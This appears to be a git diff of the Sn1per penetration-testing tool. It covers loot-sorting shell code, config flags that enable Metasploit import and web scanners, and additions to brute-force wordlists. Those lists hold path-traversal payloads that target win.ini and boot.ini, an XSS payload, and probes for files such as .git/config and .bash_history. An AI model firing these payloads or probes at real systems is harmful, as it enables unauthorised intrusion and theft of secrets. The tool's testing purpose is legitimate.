||||
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
||||
|
|
@ -380,16 +414,19 @@ function loot {
|
|||
echo ""
|
||||
cd ..
|
||||
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
|
||||
touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
|
||||
#touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null
|
||||
sed -E "s/^\.//g" $LOOT_DIR/domains/domains-all-presorted.txt | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null
|
||||
sed -E "s/^\.//g" $LOOT_DIR/domains/targets-all-presorted.txt | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
sed -i -E 's/address//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/domains-all-presorted2.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
|
||||
cd $LOOT_DIR/screenshots/
|
||||
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
|
||||
cd $LOOT_DIR
|
||||
|
||||
if [ -f $SNIPER_PRO ]; then
|
||||
if [ "$SN1PER_AUTOLOAD" = "1" ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
|
|
@ -466,6 +503,7 @@ source modes/fullportonly.sh
|
|||
source modes/web.sh
|
||||
source modes/webporthttp.sh
|
||||
source modes/webporthttps.sh
|
||||
source modes/webscan.sh
|
||||
source modes/stealth.sh
|
||||
source modes/airstrike.sh
|
||||
source modes/nuke.sh
|
||||
|
|
|
|||
18
sniper.conf
18
sniper.conf
|
|
@ -16,10 +16,10 @@ AUTOBRUTE="0"
|
|||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
ONLINE="1"
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
METASPLOIT_IMPORT="1"
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
|
||||
|
|
@ -38,10 +38,14 @@ MSF_LPORT="4444"
|
|||
CENSYS_APP_ID=""
|
||||
CENSYS_API_SECRET=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
|
||||
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
|
||||
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,action,do,war,cfm,page,bak,cfg,sql,txt,md,zip,jar,tar.gz,conf,swp,xml,ini,yml,cgi,pl,js,json"
|
||||
|
||||
# DOMAIN WORDLISTS
|
||||
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
|
||||
|
|
@ -89,6 +93,9 @@ METAGOOFIL="1"
|
|||
|
||||
# ACTIVE WEB PLUGINS
|
||||
BURP_SCAN="1"
|
||||
ARACHNI_SCAN="1"
|
||||
DIRSEARCH="1"
|
||||
GOBUSTER="0"
|
||||
NIKTO="1"
|
||||
BLACKWIDOW="1"
|
||||
CLUSTERD="1"
|
||||
|
|
@ -110,7 +117,8 @@ WEB_BRUTE_EXPLOITSCAN="1"
|
|||
WAYBACKMACHINE="1"
|
||||
SSL="1"
|
||||
PASSIVE_SPIDER="1"
|
||||
CUTYCAPT="1"
|
||||
CUTYCAPT="0"
|
||||
WEBSCREENSHOT="1"
|
||||
|
||||
# EMAIL PLUGINS
|
||||
SPOOF_CHECK="1"
|
||||
|
|
@ -125,4 +133,6 @@ DNSCAN="1"
|
|||
CRTSH="1"
|
||||
SUBOVER="1"
|
||||
PROJECT_SONAR="1"
|
||||
CENSYS_SUBDOMAINS="1"
|
||||
CENSYS_SUBDOMAINS="1"
|
||||
SUBNET_RETRIEVAL="1"
|
||||
SUBJACK="1"
|
||||
|
|
@ -1,4 +1,11 @@
|
|||
|
||||
.git/config
|
||||
.travis.yml
|
||||
Makefile
|
||||
Dockerfile
|
||||
package.json
|
||||
gulpfile.js
|
||||
composer.json
|
||||
web.config
|
||||
.bash_history
|
||||
.bashrc
|
||||
.cache
|
||||
|
|
@ -11,6 +18,10 @@
|
|||
.hta
|
||||
.htaccess
|
||||
.htpasswd
|
||||
.DS_Store
|
||||
readme.md
|
||||
readme.txt
|
||||
.gitignore
|
||||
.listing
|
||||
.listings
|
||||
.mysql_history
|
||||
|
|
|
|||
|
|
@ -7,6 +7,7 @@
|
|||
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
|
||||
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
|
||||
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
|
||||
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../windows/win.ini
|
||||
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
|
||||
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
|
||||
ab2/\@AdminViewError
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
|
|
@ -32,4 +32,16 @@ admin
|
|||
Admin
|
||||
data
|
||||
portal
|
||||
js
|
||||
js
|
||||
.git/config
|
||||
.travis.yml
|
||||
Makefile
|
||||
Dockerfile
|
||||
package.json
|
||||
gulpfile.js
|
||||
composer.json
|
||||
web.config
|
||||
.DS_Store
|
||||
readme.md
|
||||
readme.txt
|
||||
.gitignore
|
||||
|
|
@ -47,6 +47,7 @@ servlet/AdminServlet
|
|||
servlet/AxisServlet
|
||||
TiVoConnect?Command=QueryServer
|
||||
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
|
||||
cgi-bin/config.exp
|
||||
cgi-bin/cart32.exe
|
||||
cgi-bin/classified.cgi
|
||||
cgi-bin/download.cgi
|
||||
|
|
|
|||
Loading…
Reference in New Issue